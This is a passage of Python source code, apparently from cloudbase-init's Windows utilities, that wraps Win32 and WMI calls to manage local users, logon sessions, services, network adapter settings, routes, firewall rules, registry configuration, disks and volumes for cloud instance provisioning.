lmi = Win32_LOCALGROUP_MEMBERS_INFO_3()
lmi.lgrmi3_domainandname = six.text_type(username)
ret_val = netapi32.NetLocalGroupAddMembers(0, six.text_type(groupname),
3, ctypes.pointer(lmi), 1)
if ret_val == self.NERR_GroupNotFound:
raise exception.CloudbaseInitException("Group '%s' not found"
% groupname)
elif ret_val == self.ERROR_ACCESS_DENIED:
raise exception.CloudbaseInitException('Access denied')
elif ret_val == self.ERROR_NO_SUCH_MEMBER:
raise exception.CloudbaseInitException("Username '%s' not found"
% username)
elif ret_val == self.ERROR_MEMBER_IN_ALIAS:
# The user is already a member of the group
pass
elif ret_val == self.ERROR_INVALID_MEMBER:
raise exception.CloudbaseInitException('Invalid user')
elif ret_val != 0:
raise exception.CloudbaseInitException('Unknown error')
def get_user_sid(self, username):
try:
user_info = self._get_user_info(username, 4)
return str(user_info["user_sid"])[6:]
except exception.ItemNotFoundException:
# User not found
pass
def create_user_logon_session(self, username, password, domain='.',
load_profile=True,
logon_type=LOGON32_LOGON_INTERACTIVE):
LOG.debug("Creating logon session for user: %(domain)s\\%(username)s",
{"username": username, "domain": domain})
token = wintypes.HANDLE()
ret_val = advapi32.LogonUserW(six.text_type(username),
six.text_type(domain),
six.text_type(password),
logon_type,
self.LOGON32_PROVIDER_DEFAULT,
ctypes.byref(token))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"User logon failed: %r")
if load_profile:
pi = Win32_PROFILEINFO()
pi.dwSize = ctypes.sizeof(Win32_PROFILEINFO)
pi.lpUserName = six.text_type(username)
ret_val = userenv.LoadUserProfileW(token, ctypes.byref(pi))
if not ret_val:
kernel32.CloseHandle(token)
raise exception.WindowsCloudbaseInitException(
"Cannot load user profile: %r")
return token
def get_current_user(self):
"""Get the user account name from the underlying instance."""
buf_len = wintypes.ULONG(512)
buf = ctypes.create_unicode_buffer(512)
ret_val = secur32.GetUserNameExW(
self.EXTENDED_NAME_FORMAT_SAM_COMPATIBLE,
buf, ctypes.byref(buf_len))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"GetUserNameExW failed: %r")
return buf.value.split("\\")
def execute_process_as_user(self, token, args, wait=True,
new_console=False):
"""Executes processes as an user.
:param token: Represents the user logon session token, resulted from
running the 'create_user_logon_session' method.
:param args: The arguments with which the process will be run with.
:param wait: Specifies if it's needed to wait for the process
handler to finish up running all the operations
on the process object.
:param new_console: Specifies whether the process should run
under a new console or not.
:return: The exit code value resulted from the running process.
:rtype: int
"""
LOG.debug("Executing process as user, command line: %s", args)
proc_info = Win32_PROCESS_INFORMATION()
startup_info = Win32_STARTUPINFO_W()
startup_info.cb = ctypes.sizeof(Win32_STARTUPINFO_W)
startup_info.lpDesktop = ""
flags = self.CREATE_NEW_CONSOLE if new_console else 0
cmdline = ctypes.create_unicode_buffer(subprocess.list2cmdline(args))
try:
ret_val = advapi32.CreateProcessAsUserW(
token, None, cmdline, None, None, False, flags, None, None,
ctypes.byref(startup_info), ctypes.byref(proc_info))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"CreateProcessAsUserW failed: %r")
if wait and proc_info.hProcess:
kernel32.WaitForSingleObject(
proc_info.hProcess, self.INFINITE)
exit_code = wintypes.DWORD()
if not kernel32.GetExitCodeProcess(
proc_info.hProcess, ctypes.byref(exit_code)):
raise exception.WindowsCloudbaseInitException(
"GetExitCodeProcess failed: %r")
return exit_code.value
finally:
if proc_info.hProcess:
kernel32.CloseHandle(proc_info.hProcess)
if proc_info.hThread:
kernel32.CloseHandle(proc_info.hThread)
def close_user_logon_session(self, token):
kernel32.CloseHandle(token)
def get_user_home(self, username):
user_sid = self.get_user_sid(username)
if user_sid:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SOFTWARE\\'
'Microsoft\\Windows NT\\CurrentVersion\\'
'ProfileList\\%s' % user_sid) as key:
return winreg.QueryValueEx(key, 'ProfileImagePath')[0]
LOG.debug('Home directory not found for user %r', username)
return None
def sanitize_shell_input(self, value):
return value.replace('"', '\\"')
def set_host_name(self, new_host_name):
ret_val = kernel32.SetComputerNameExW(
self.ComputerNamePhysicalDnsHostname,
six.text_type(new_host_name))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"Cannot set host name: %r")
return True
def get_network_adapters(self):
"""Return available adapters as a list of tuples of (name, mac)."""
conn = wmi.WMI(moniker='//./root/cimv2')
# Get Ethernet adapters only
wql = ('SELECT * FROM Win32_NetworkAdapter WHERE '
'AdapterTypeId = 0 AND MACAddress IS NOT NULL')
if self.check_os_version(6, 0):
wql += ' AND PhysicalAdapter = True'
q = conn.query(wql)
return [(r.NetConnectionID, r.MACAddress) for r in q]
def get_dhcp_hosts_in_use(self):
dhcp_hosts = []
for net_addr in network.get_adapter_addresses():
if net_addr["dhcp_enabled"] and net_addr["dhcp_server"]:
dhcp_hosts.append((net_addr["friendly_name"],
net_addr["mac_address"],
net_addr["dhcp_server"]))
return dhcp_hosts
def set_ntp_client_config(self, ntp_hosts):
base_dir = self._get_system_dir()
w32tm_path = os.path.join(base_dir, "w32tm.exe")
# Convert the NTP hosts list to a string, in order to pass
# it to w32tm.
ntp_hosts = ",".join(ntp_hosts)
args = [w32tm_path, '/config', '/manualpeerlist:%s' % ntp_hosts,
'/syncfromflags:manual', '/update']
(out, err, ret_val) = self.execute_process(args, shell=False)
if ret_val:
raise exception.CloudbaseInitException(
'w32tm failed to configure NTP.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def get_network_adapter_name_by_mac_address(self, mac_address):
iface_index_list = [
net_addr for net_addr
in network.get_adapter_addresses()
if net_addr["mac_address"] is not None and
net_addr["mac_address"].lower() == mac_address.lower()]
if not iface_index_list:
raise exception.ItemNotFoundException(
'Network interface with MAC address "%s" not found' %
mac_address)
if len(iface_index_list) > 1:
raise exception.CloudbaseInitException(
'Multiple network interfaces with MAC address "%s" exist' %
mac_address)
return iface_index_list[0]["friendly_name"]
@retry_decorator.retry_decorator(
max_retry_count=3, exceptions=exception.ItemNotFoundException)
def set_network_adapter_mtu(self, name, mtu):
if not self.check_os_version(6, 0):
raise exception.CloudbaseInitException(
'Setting the MTU is currently not supported on Windows XP '
'and Windows Server 2003')
iface_index_list = [
net_addr["interface_index"] for net_addr
in network.get_adapter_addresses()
if net_addr["friendly_name"] == name]
if not iface_index_list:
raise exception.ItemNotFoundException(
'Network interface with name "%s" not found' %
name)
else:
iface_index = iface_index_list[0]
LOG.debug('Setting MTU for interface "%(name)s" with '
'value "%(mtu)s"',
{'name': name, 'mtu': mtu})
base_dir = self._get_system_dir()
netsh_path = os.path.join(base_dir, 'netsh.exe')
args = [netsh_path, "interface", "ipv4", "set", "subinterface",
str(iface_index), "mtu=%s" % mtu,
"store=persistent"]
(out, err, ret_val) = self.execute_process(args, shell=False)
if ret_val:
raise exception.CloudbaseInitException(
'Setting MTU for interface "%(name)s" with '
'value "%(mtu)s" failed' % {'name': name, 'mtu': mtu})
def rename_network_adapter(self, old_name, new_name):
base_dir = self._get_system_dir()
netsh_path = os.path.join(base_dir, 'netsh.exe')
args = [netsh_path, "interface", "set", "interface",
'name=%s' % old_name, 'newname=%s' % new_name]
(out, err, ret_val) = self.execute_process(args, shell=False)
if ret_val:
raise exception.CloudbaseInitException(
'Renaming interface "%(old_name)s" to "%(new_name)s" '
'failed' % {'old_name': old_name, 'new_name': new_name})
@staticmethod
def _get_network_adapter(name):
conn = wmi.WMI(moniker='//./root/cimv2')
query = conn.Win32_NetworkAdapter(NetConnectionID=name)
if not len(query):
raise exception.CloudbaseInitException(
"Network adapter not found: %s" % name)
return query[0]
@staticmethod
def _set_static_network_config_legacy(name, address, netmask, gateway,
dnsnameservers):
if netaddr.valid_ipv6(address):
LOG.warning("Setting IPv6 info not available on this system")
return
adapter_config = WindowsUtils._get_network_adapter(name).associators(
wmi_result_class='Win32_NetworkAdapterConfiguration')[0]
LOG.debug("Setting static IP address")
(ret_val,) = adapter_config.EnableStatic([address], [netmask])
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set static IP address on network adapter: %d" %
ret_val)
reboot_required = (ret_val == 1)
if gateway:
LOG.debug("Setting static gateways")
(ret_val,) = adapter_config.SetGateways([gateway], [1])
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set gateway on network adapter: %d" % ret_val)
reboot_required = reboot_required or ret_val == 1
if dnsnameservers:
LOG.debug("Setting static DNS servers")
(ret_val,) = adapter_config.SetDNSServerSearchOrder(dnsnameservers)
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set DNS on network adapter: %d" % ret_val)
reboot_required = reboot_required or ret_val == 1
return reboot_required
@staticmethod
def _fix_network_adapter_dhcp(interface_name, enable_dhcp, address_family):
interface_id = WindowsUtils._get_network_adapter(interface_name).GUID
tcpip_key = "Tcpip6" if address_family == AF_INET6 else "Tcpip"
with winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\services\\%(tcpip_key)s\\"
"Parameters\\Interfaces\\%(interface_id)s" %
{"tcpip_key": tcpip_key, "interface_id": interface_id},
0, winreg.KEY_SET_VALUE) as key:
winreg.SetValueEx(
key, 'EnableDHCP', 0, winreg.REG_DWORD,
1 if enable_dhcp else 0)
@staticmethod
def _set_interface_dns(interface_name, dnsnameservers):
# Import here to avoid loading errors on Windows versions where MI is
# not available
import mi
conn = wmi.WMI(moniker='//./root/standardcimv2')
# Requires Windows >= 6.2
dns_client = conn.MSFT_DnsClientServerAddress(
InterfaceAlias=interface_name)
if not len(dns_client):
raise exception.ItemNotFoundException(
'Network interface with name "%s" not found' %
interface_name)
dns_client = dns_client[0]
custom_options = [{
u'name': u'ServerAddresses',
u'value_type': mi.MI_ARRAY | mi.MI_STRING,
u'value': dnsnameservers
}]
operation_options = {u'custom_options': custom_options}
dns_client.put(operation_options=operation_options)
def enable_network_adapter(self, name, enabled):
adapter = self._get_network_adapter(name)
if enabled:
adapter.Enable()
else:
adapter.Disable()
@staticmethod
def _set_static_network_config(name, address, prefix_len, gateway):
if netaddr.valid_ipv6(address):
family = AF_INET6
else:
family = AF_INET
# This is needed to avoid the error:
# "Inconsistent parameters PolicyStore PersistentStore and
# Dhcp Enabled"
WindowsUtils._fix_network_adapter_dhcp(name, False, family)
conn = wmi.WMI(moniker='//./root/standardcimv2')
existing_addresses = conn.MSFT_NetIPAddress(
AddressFamily=family, InterfaceAlias=name)
for existing_address in existing_addresses:
LOG.debug(
"Removing existing IP address \"%(ip)s\" "
"from adapter \"%(name)s\"",
{"ip": existing_address.IPAddress, "name": name})
existing_address.Delete_()
existing_routes = conn.MSFT_NetRoute(
AddressFamily=family, InterfaceAlias=name)
for existing_route in existing_routes:
LOG.debug(
"Removing existing route \"%(route)s\" "
"from adapter \"%(name)s\"",
{"route": existing_route.DestinationPrefix, "name": name})
existing_route.Delete_()
conn.MSFT_NetIPAddress.create(
AddressFamily=family, InterfaceAlias=name, IPAddress=address,
PrefixLength=prefix_len, DefaultGateway=gateway)
def set_static_network_config(self, name, address, prefix_len_or_netmask,
gateway, dnsnameservers):
ip_network = netaddr.IPNetwork(
u"%s/%s" % (address, prefix_len_or_netmask))
prefix_len = ip_network.prefixlen
netmask = str(ip_network.netmask)
if self.check_os_version(6, 2):
self._set_static_network_config(
name, address, prefix_len, gateway)
if len(dnsnameservers):
self._set_interface_dns(name, dnsnameservers)
else:
return self._set_static_network_config_legacy(
name, address, netmask, gateway, dnsnameservers)
def _get_network_team_manager(self):
if self._network_team_manager:
return self._network_team_manager
team_managers = [
"cloudbaseinit.utils.windows.netlbfo.NetLBFOTeamManager",
]
cl = classloader.ClassLoader()
for class_name in team_managers:
try:
cls = cl.load_class(class_name)
if cls.is_available():
self._network_team_manager = cls()
return self._network_team_manager
except Exception as ex:
LOG.exception(ex)
raise exception.ItemNotFoundException(
"No network team manager available")
def create_network_team(self, team_name, mode, load_balancing_algorithm,
members, mac_address, primary_nic_name=None,
primary_nic_vlan_id=None, lacp_timer=None):
self._get_network_team_manager().create_team(
team_name, mode, load_balancing_algorithm, members, mac_address,
primary_nic_name, primary_nic_vlan_id, lacp_timer)
def add_network_team_nic(self, team_name, nic_name, vlan_id):
self._get_network_team_manager().add_team_nic(
team_name, nic_name, vlan_id)
def _get_config_key_name(self, section):
key_name = self._config_key
if section:
key_name += section.replace('/', '\\') + '\\'
return key_name
def set_config_value(self, name, value, section=None):
key_name = self._get_config_key_name(section)
with winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE,
key_name) as key:
if type(value) == int:
regtype = winreg.REG_DWORD
else:
regtype = winreg.REG_SZ
winreg.SetValueEx(key, name, 0, regtype, value)
def get_config_value(self, name, section=None):
key_name = self._get_config_key_name(section)
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
key_name) as key:
(value, regtype) = winreg.QueryValueEx(key, name)
return value
except WindowsError:
return None
def wait_for_boot_completion(self):
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
"SYSTEM\\Setup\\Status\\SysprepStatus", 0,
winreg.KEY_READ) as key:
while True:
gen_state = winreg.QueryValueEx(key,
"GeneralizationState")[0]
if gen_state == 7:
break
time.sleep(1)
LOG.info('Waiting for sysprep completion. '
'GeneralizationState: %d', gen_state)
except WindowsError as ex:
if ex.winerror == 2:
LOG.debug('Sysprep data not found in the registry, '
'skipping sysprep completion check.')
else:
raise ex
def check_service_exists(self, service_name):
LOG.debug("Checking if service exists: %s", service_name)
try:
with self._get_service_handle(service_name):
return True
except pywintypes.error as ex:
if ex.winerror == winerror.ERROR_SERVICE_DOES_NOT_EXIST:
return False
raise
def get_service_status(self, service_name):
LOG.debug("Getting service status for: %s", service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_QUERY_STATUS) as hs:
service_status = win32service.QueryServiceStatusEx(hs)
state = service_status['CurrentState']
return self._SERVICE_STATUS_MAP.get(
state, WindowsUtils.SERVICE_STATUS_UNKNOWN)
def get_service_start_mode(self, service_name):
LOG.debug("Getting service start mode for: %s", service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_QUERY_CONFIG) as hs:
service_config = win32service.QueryServiceConfig(hs)
start_type = service_config[1]
return [k for k, v in self._SERVICE_START_TYPE_MAP.items()
if v == start_type][0]
def set_service_start_mode(self, service_name, start_mode):
# TODO(alexpilotti): Handle the "Delayed Start" case
LOG.debug("Setting service start mode for: %s", service_name)
start_type = self._get_win32_start_type(start_mode)
with self._get_service_handle(
service_name, win32service.SERVICE_CHANGE_CONFIG) as hs:
win32service.ChangeServiceConfig(
hs, win32service.SERVICE_NO_CHANGE,
start_type, win32service.SERVICE_NO_CHANGE,
None, None, False, None, None, None, None)
def start_service(self, service_name):
LOG.debug('Starting service %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_START) as hs:
win32service.StartService(hs, service_name)
def stop_service(self, service_name, wait=False):
LOG.debug('Stopping service %s', service_name)
with self._get_service_handle(
service_name,
win32service.SERVICE_STOP |
win32service.SERVICE_QUERY_STATUS) as hs:
win32service.ControlService(hs, win32service.SERVICE_CONTROL_STOP)
if wait:
while True:
service_status = win32service.QueryServiceStatusEx(hs)
state = service_status['CurrentState']
if state == win32service.SERVICE_STOPPED:
return
time.sleep(.1)
@staticmethod
@contextlib.contextmanager
def _get_service_control_manager(
scm_access=win32service.SC_MANAGER_CONNECT):
hscm = win32service.OpenSCManager(None, None, scm_access)
try:
yield hscm
finally:
win32service.CloseServiceHandle(hscm)
@staticmethod
@contextlib.contextmanager
def _get_service_handle(service_name,
service_access=win32service.SERVICE_QUERY_CONFIG,
scm_access=win32service.SC_MANAGER_CONNECT):
with WindowsUtils._get_service_control_manager(scm_access) as hscm:
hs = win32service.OpenService(hscm, service_name, service_access)
try:
yield hs
finally:
win32service.CloseServiceHandle(hs)
@staticmethod
def _get_win32_start_type(start_mode):
start_type = WindowsUtils._SERVICE_START_TYPE_MAP.get(start_mode)
if not start_type:
raise exception.InvalidStateException(
"Invalid service start mode: %s" % start_mode)
return start_type
def create_service(self, service_name, display_name, path, start_mode,
username=None, password=None):
LOG.debug('Creating service %s', service_name)
start_type = self._get_win32_start_type(start_mode)
with WindowsUtils._get_service_control_manager(
scm_access=win32service.SC_MANAGER_CREATE_SERVICE) as hscm:
hs = win32service.CreateService(
hscm, service_name, display_name,
win32service.SERVICE_ALL_ACCESS,
win32service.SERVICE_WIN32_OWN_PROCESS,
start_type,
win32service.SERVICE_ERROR_NORMAL,
path, None, False, None,
username, password)
win32service.CloseServiceHandle(hs)
def delete_service(self, service_name):
LOG.debug('Deleting service %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_ALL_ACCESS) as hs:
win32service.DeleteService(hs)
def set_service_credentials(self, service_name, username, password):
LOG.debug('Setting service credentials: %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_CHANGE_CONFIG) as hs:
win32service.ChangeServiceConfig(
hs,
win32service.SERVICE_NO_CHANGE,
win32service.SERVICE_NO_CHANGE,
win32service.SERVICE_NO_CHANGE,
None,
None,
False,
None,
username,
password,
None)
def get_service_username(self, service_name):
LOG.debug('Getting service username: %s', service_name)
with self._get_service_handle(service_name) as hs:
cfg = win32service.QueryServiceConfig(hs)
return cfg[7]
def reset_service_password(self):
"""This is needed to avoid pass the hash attacks."""
if not self.check_service_exists(self._service_name):
LOG.info("Service does not exist: %s", self._service_name)
return None
service_username = self.get_service_username(self._service_name)
# Ignore builtin accounts
if "\\" not in service_username:
LOG.info("Skipping password reset, service running as a built-in "
"account: %s", service_username)
return None
domain, username = service_username.split('\\')
if domain != ".":
LOG.info("Skipping password reset, service running as a domain "
"account: %s", service_username)
return None
LOG.debug('Resetting password for service user: %s', service_username)
maximum_length = self.get_maximum_password_length()
password = self.generate_random_password(maximum_length)
self.set_user_password(username, password)
self.set_service_credentials(
self._service_name, service_username, password)
return domain, username, password
def terminate(self):
# Wait for the service to start. Polling the service "Started" property
# is not enough
time.sleep(3)
self.stop_service(self._service_name)
def get_default_gateway(self):
default_routes = [r for r in self._get_ipv4_routing_table()
if r[0] == '0.0.0.0']
if default_routes:
return default_routes[0][3], default_routes[0][2]
else:
return None, None
@staticmethod
def _heap_alloc(heap, size):
table_mem = kernel32.HeapAlloc(heap, 0, ctypes.c_size_t(size.value))
if not table_mem:
raise exception.CloudbaseInitException(
'Unable to allocate memory for the IP forward table')
return table_mem
@contextlib.contextmanager
def _get_forward_table(self):
heap = kernel32.GetProcessHeap()
forward_table_size = ctypes.sizeof(Win32_MIB_IPFORWARDTABLE)
size = wintypes.ULONG(forward_table_size)
table_mem = self._heap_alloc(heap, size)
p_forward_table = ctypes.cast(
table_mem, ctypes.POINTER(Win32_MIB_IPFORWARDTABLE))
try:
err = iphlpapi.GetIpForwardTable(p_forward_table,
ctypes.byref(size), 0)
if err == self.ERROR_INSUFFICIENT_BUFFER:
kernel32.HeapFree(heap, 0, p_forward_table)
table_mem = self._heap_alloc(heap, size)
p_forward_table = ctypes.cast(
table_mem,
ctypes.POINTER(Win32_MIB_IPFORWARDTABLE))
err = iphlpapi.GetIpForwardTable(p_forward_table,
ctypes.byref(size), 0)
if err and err != kernel32.ERROR_NO_DATA:
raise exception.CloudbaseInitException(
'Unable to get IP forward table. Error: %s' % err)
yield p_forward_table
finally:
kernel32.HeapFree(heap, 0, p_forward_table)
def _get_ipv4_routing_table(self):
routing_table = []
with self._get_forward_table() as p_forward_table:
forward_table = p_forward_table.contents
table = ctypes.cast(
ctypes.addressof(forward_table.table),
ctypes.POINTER(Win32_MIB_IPFORWARDROW *
forward_table.dwNumEntries)).contents
for row in table:
destination = Ws2_32.inet_ntoa(
row.dwForwardDest).decode()
netmask = Ws2_32.inet_ntoa(
row.dwForwardMask).decode()
gateway = Ws2_32.inet_ntoa(
row.dwForwardNextHop).decode()
routing_table.append((
destination,
netmask,
gateway,
row.dwForwardIfIndex,
row.dwForwardMetric1))
return routing_table
def check_static_route_exists(self, destination):
return len([r for r in self._get_ipv4_routing_table()
if r[0] == destination]) > 0
def add_static_route(self, destination, mask, next_hop, interface_index,
metric):
args = ['ROUTE', 'ADD', destination, 'MASK', mask, next_hop]
(out, err, ret_val) = self.execute_process(args)
# Cannot use the return value to determine the outcome
if ret_val or err:
raise exception.CloudbaseInitException(
'Unable to add route: %s' % err)
def get_os_version(self):
vi = Win32_OSVERSIONINFOEX_W()
vi.dwOSVersionInfoSize = ctypes.sizeof(Win32_OSVERSIONINFOEX_W)
ret_val = ntdll.RtlGetVersion(ctypes.byref(vi))
if ret_val:
raise exception.WindowsCloudbaseInitException(
"RtlGetVersion failed with error: %s" % ret_val)
return {"major_version": vi.dwMajorVersion,
"minor_version": vi.dwMinorVersion,
"build_number": vi.dwBuildNumber,
"platform_id": vi.dwPlatformId,
"csd_version": vi.szCSDVersion,
"service_pack_major": vi.wServicePackMajor,
"service_pack_minor": vi.wServicePackMinor,
"suite_mask": vi.wSuiteMask,
"product_type": vi.wProductType}
def is_client_os(self):
return self.get_os_version()["product_type"] == self.VER_NT_WORKSTATION
def check_os_version(self, major, minor, build=0):
vi = Win32_OSVERSIONINFOEX_W()
vi.dwOSVersionInfoSize = ctypes.sizeof(Win32_OSVERSIONINFOEX_W)
vi.dwMajorVersion = major
vi.dwMinorVersion = minor
vi.dwBuildNumber = build
mask = 0
for type_mask in [VER_MAJORVERSION, VER_MINORVERSION, VER_BUILDNUMBER]:
mask = kernel32.VerSetConditionMask(mask, type_mask,
VER_GREATER_EQUAL)
type_mask = VER_MAJORVERSION | VER_MINORVERSION | VER_BUILDNUMBER
ret_val = ntdll.RtlVerifyVersionInfo(ctypes.byref(vi), type_mask, mask)
if not ret_val:
return True
elif ret_val == self.STATUS_REVISION_MISMATCH:
return False
else:
raise exception.CloudbaseInitException(
"RtlVerifyVersionInfo failed with error: %s" % ret_val)
def get_volume_label(self, drive):
max_label_size = 261
label = ctypes.create_unicode_buffer(max_label_size)
ret_val = kernel32.GetVolumeInformationW(six.text_type(drive), label,
max_label_size, 0, 0, 0, 0, 0)
if ret_val:
return label.value
def get_volume_path_names_by_mount_point(self, mount_point):
max_volume_name_len = 50
volume_name = ctypes.create_unicode_buffer(max_volume_name_len)
if not kernel32.GetVolumeNameForVolumeMountPointW(
six.text_type(mount_point), volume_name,
max_volume_name_len):
if kernel32.GetLastError() in [self.ERROR_INVALID_NAME,
self.ERROR_PATH_NOT_FOUND]:
raise exception.ItemNotFoundException(
"Mount point not found: %s" % mount_point)
else:
raise exception.WindowsCloudbaseInitException(
"Failed to get volume name for mount point: %s. "
"Error: %%r" % mount_point)
volume_path_names_len = wintypes.DWORD(100)
while True:
volume_path_names = ctypes.create_unicode_buffer(
volume_path_names_len.value)
if not kernel32.GetVolumePathNamesForVolumeNameW(
volume_name, volume_path_names, volume_path_names_len,
ctypes.byref(volume_path_names_len)):
if kernel32.GetLastError() == self.ERROR_MORE_DATA:
continue
else:
raise exception.WindowsCloudbaseInitException(
"Failed to get path names for volume name: %s."
"Error: %%r" % volume_name.value)
return [n for n in volume_path_names[
:volume_path_names_len.value - 1].split('\0') if n]
def generate_random_password(self, length):
if length < 3:
raise exception.CloudbaseInitException(
"Password can not have less than 3 characters!")
while True:
pwd = super(WindowsUtils, self).generate_random_password(length)
# Make sure that the Windows complexity requirements are met:
# http://technet.microsoft.com/en-us/library/cc786468(v=ws.10).aspx
valid = True
for r in ["[a-z]", "[A-Z]", "[0-9]"]:
if not re.search(r, pwd):
valid = False
if valid:
return pwd
def _split_str_buf_list(self, buf, buf_len):
i = 0
value = ''
values = []
while i < buf_len:
c = buf[i]
if c != '\x00':
value += c
else:
values.append(value)
value = ''
i += 1
return values
def get_logical_drives(self):
buf_size = self.MAX_PATH
buf = ctypes.create_unicode_buffer(buf_size + 1)
buf_len = kernel32.GetLogicalDriveStringsW(buf_size, buf)
if not buf_len:
raise exception.WindowsCloudbaseInitException(
"GetLogicalDriveStringsW failed: %r")
return self._split_str_buf_list(buf, buf_len)
def get_cdrom_drives(self):
drives = self.get_logical_drives()
return [d for d in drives if kernel32.GetDriveTypeW(d) ==
self.DRIVE_CDROM]
def _is_64bit_arch(self):
# interpreter's bits
return struct.calcsize("P") == 8
def get_physical_disks(self):
physical_disks = []
disk_guid = GUID_DEVINTERFACE_DISK
handle_disks = setupapi.SetupDiGetClassDevsW(
ctypes.byref(disk_guid), None, None,
self.DIGCF_PRESENT | self.DIGCF_DEVICEINTERFACE)
if handle_disks == self.INVALID_HANDLE_VALUE:
raise exception.CloudbaseInitException(
"SetupDiGetClassDevs failed")
try:
did = Win32_SP_DEVICE_INTERFACE_DATA()
did.cbSize = ctypes.sizeof(Win32_SP_DEVICE_INTERFACE_DATA)
index = 0
while setupapi.SetupDiEnumDeviceInterfaces(
handle_disks, None, ctypes.byref(disk_guid), index,
ctypes.byref(did)):
index += 1
handle_disk = self.INVALID_HANDLE_VALUE
required_size = wintypes.DWORD()
if not setupapi.SetupDiGetDeviceInterfaceDetailW(
handle_disks, ctypes.byref(did), None, 0,
ctypes.byref(required_size), None):
if (kernel32.GetLastError() !=
self.ERROR_INSUFFICIENT_BUFFER):
raise exception.WindowsCloudbaseInitException(
"SetupDiGetDeviceInterfaceDetailW failed: %r")
pdidd = ctypes.cast(
msvcrt.malloc(ctypes.c_size_t(required_size.value)),
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W))
try:
pdidd.contents.cbSize = ctypes.sizeof(
Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W)
if not self._is_64bit_arch():
# NOTE(cpoieana): For some reason, on x86 platforms
# the alignment or content of the struct
# is not taken into consideration.
pdidd.contents.cbSize = 6
if not setupapi.SetupDiGetDeviceInterfaceDetailW(
handle_disks, ctypes.byref(did), pdidd,
required_size, None, None):
raise exception.WindowsCloudbaseInitException(
"SetupDiGetDeviceInterfaceDetailW failed: %r")
device_path = ctypes.cast(
pdidd.contents.DevicePath, wintypes.LPWSTR).value
handle_disk = kernel32.CreateFileW(
device_path, 0, self.FILE_SHARE_READ,
None, self.OPEN_EXISTING, 0, 0)
if handle_disk == self.INVALID_HANDLE_VALUE:
raise exception.CloudbaseInitException(
'CreateFileW failed')
sdn = Win32_STORAGE_DEVICE_NUMBER()
b = wintypes.DWORD()
if not kernel32.DeviceIoControl(
handle_disk, self.IOCTL_STORAGE_GET_DEVICE_NUMBER,
None, 0, ctypes.byref(sdn), ctypes.sizeof(sdn),
ctypes.byref(b), None):
raise exception.WindowsCloudbaseInitException(
'DeviceIoControl failed: %r')
physical_disks.append(
r"\\.\PHYSICALDRIVE%d" % sdn.DeviceNumber)
finally:
msvcrt.free(pdidd)
if handle_disk != self.INVALID_HANDLE_VALUE:
kernel32.CloseHandle(handle_disk)
finally:
setupapi.SetupDiDestroyDeviceInfoList(handle_disks)
return physical_disks
def get_volumes(self):
"""Retrieve a list with all the volumes found on all disks."""
volumes = []
volume = ctypes.create_unicode_buffer(chr(0) * self.MAX_PATH)
handle_volumes = kernel32.FindFirstVolumeW(volume, self.MAX_PATH)
if handle_volumes == self.INVALID_HANDLE_VALUE:
raise exception.WindowsCloudbaseInitException(
"FindFirstVolumeW failed: %r")
try:
while True:
volumes.append(volume.value)
found = kernel32.FindNextVolumeW(handle_volumes, volume,
self.MAX_PATH)
if not found:
errno = ctypes.GetLastError()
if errno == self.ERROR_NO_MORE_FILES:
break
else:
raise exception.WindowsCloudbaseInitException(
"FindNextVolumeW failed: %r")
finally:
kernel32.FindVolumeClose(handle_volumes)
return volumes
def _get_fw_protocol(self, protocol):
if protocol == self.PROTOCOL_TCP:
fw_protocol = self._FW_IP_PROTOCOL_TCP
elif protocol == self.PROTOCOL_UDP:
fw_protocol = self._FW_IP_PROTOCOL_UDP
else:
raise NotImplementedError("Unsupported protocol")
return fw_protocol
def firewall_create_rule(self, name, port, protocol, allow=True):
if not allow:
raise NotImplementedError()
fw_port = client.Dispatch("HNetCfg.FWOpenPort")
fw_port.Name = name
fw_port.Protocol = self._get_fw_protocol(protocol)
fw_port.Port = port
fw_port.Scope = self._FW_SCOPE_ALL
fw_port.Enabled = True
fw_mgr = client.Dispatch("HNetCfg.FwMgr")
fw_profile = fw_mgr.LocalPolicy.CurrentProfile
fw_profile = fw_profile.GloballyOpenPorts.Add(fw_port)
def firewall_remove_rule(self, name, port, protocol, allow=True):
if not allow:
raise NotImplementedError()
fw_mgr = client.Dispatch("HNetCfg.FwMgr")
fw_profile = fw_mgr.LocalPolicy.CurrentProfile
fw_protocol = self._get_fw_protocol(protocol)
fw_profile = fw_profile.GloballyOpenPorts.Remove(port, fw_protocol)
def is_wow64(self):
return win32process.IsWow64Process()
def get_system32_dir(self):
return os.path.expandvars('%windir%\\system32')
def get_syswow64_dir(self):
return os.path.expandvars('%windir%\\syswow64')
def get_sysnative_dir(self):
return os.path.expandvars('%windir%\\sysnative')
def check_sysnative_dir_exists(self):
sysnative_dir_exists = os.path.isdir(self.get_sysnative_dir())
if not sysnative_dir_exists and self.is_wow64():
LOG.warning('Unable to validate sysnative folder presence. '
'If Target OS is Server 2003 x64, please ensure '
'you have KB942589 installed')
return sysnative_dir_exists
def _get_system_dir(self, sysnative=True):
"""Return Windows system directory with compatibility support.
Depending on the interpreter bits and platform architecture,
the return value may vary between
C:\Windows\(System32|SysWOW64|Sysnative).
Note that "Sysnative" is just an alias (doesn't really exist on disk).
More info about this can be found in documentation.
"""
if sysnative and self.check_sysnative_dir_exists():
return self.get_sysnative_dir()
if not sysnative and self._is_64bit_arch():
return self.get_syswow64_dir()
return self.get_system32_dir()
def is_nano_server(self):
return self._check_server_level("NanoServer")
def _check_server_level(self, server_level):
try:
with winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
